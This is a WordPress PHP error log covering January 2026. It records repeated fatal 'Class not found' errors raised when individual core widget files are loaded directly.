[06-Jan-2026 22:12:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[06-Jan-2026 22:15:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[07-Jan-2026 02:05:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[07-Jan-2026 05:25:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[07-Jan-2026 07:43:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[07-Jan-2026 08:26:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[07-Jan-2026 10:36:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[07-Jan-2026 13:04:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[07-Jan-2026 13:53:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[07-Jan-2026 15:47:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[07-Jan-2026 21:56:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[07-Jan-2026 22:37:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[08-Jan-2026 04:53:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[08-Jan-2026 07:26:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[08-Jan-2026 08:18:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[08-Jan-2026 10:45:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[08-Jan-2026 11:28:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[08-Jan-2026 17:23:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[08-Jan-2026 18:57:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[08-Jan-2026 20:36:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[08-Jan-2026 22:59:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[09-Jan-2026 01:27:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[09-Jan-2026 01:29:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[09-Jan-2026 05:58:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[09-Jan-2026 07:14:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[09-Jan-2026 17:02:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[10-Jan-2026 01:54:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[10-Jan-2026 15:20:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[11-Jan-2026 00:30:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[11-Jan-2026 00:55:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[11-Jan-2026 06:13:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[11-Jan-2026 08:27:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[11-Jan-2026 14:39:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[11-Jan-2026 20:08:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[12-Jan-2026 01:56:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[12-Jan-2026 03:48:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[12-Jan-2026 06:42:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[12-Jan-2026 07:05:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[12-Jan-2026 09:25:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[12-Jan-2026 12:39:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[12-Jan-2026 13:46:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[12-Jan-2026 14:52:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[12-Jan-2026 23:45:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[13-Jan-2026 01:25:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[13-Jan-2026 06:42:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[13-Jan-2026 09:24:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[13-Jan-2026 15:23:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[13-Jan-2026 15:27:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[13-Jan-2026 19:00:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[13-Jan-2026 19:02:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[13-Jan-2026 19:03:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[13-Jan-2026 22:03:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[14-Jan-2026 00:28:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[14-Jan-2026 07:35:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[14-Jan-2026 09:04:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[14-Jan-2026 13:25:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[14-Jan-2026 17:37:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[14-Jan-2026 17:38:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[14-Jan-2026 17:54:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[14-Jan-2026 18:28:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[14-Jan-2026 21:21:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[15-Jan-2026 02:23:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[15-Jan-2026 03:34:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[15-Jan-2026 10:20:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[15-Jan-2026 13:19:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[15-Jan-2026 23:41:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[16-Jan-2026 00:45:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[16-Jan-2026 13:52:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[16-Jan-2026 14:19:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[16-Jan-2026 18:30:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[16-Jan-2026 20:01:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[16-Jan-2026 23:25:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[17-Jan-2026 02:05:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[17-Jan-2026 06:12:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[17-Jan-2026 14:01:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[17-Jan-2026 14:12:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[17-Jan-2026 14:14:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[18-Jan-2026 00:55:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[18-Jan-2026 01:08:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[18-Jan-2026 04:08:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[18-Jan-2026 04:29:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[18-Jan-2026 08:55:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[18-Jan-2026 12:04:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[18-Jan-2026 14:09:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[18-Jan-2026 14:22:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[18-Jan-2026 20:35:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[19-Jan-2026 00:36:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[19-Jan-2026 01:26:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[19-Jan-2026 06:35:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[19-Jan-2026 12:51:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[19-Jan-2026 14:09:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[19-Jan-2026 14:11:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[20-Jan-2026 00:15:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[20-Jan-2026 02:47:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[20-Jan-2026 03:38:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[20-Jan-2026 08:44:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[20-Jan-2026 13:40:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
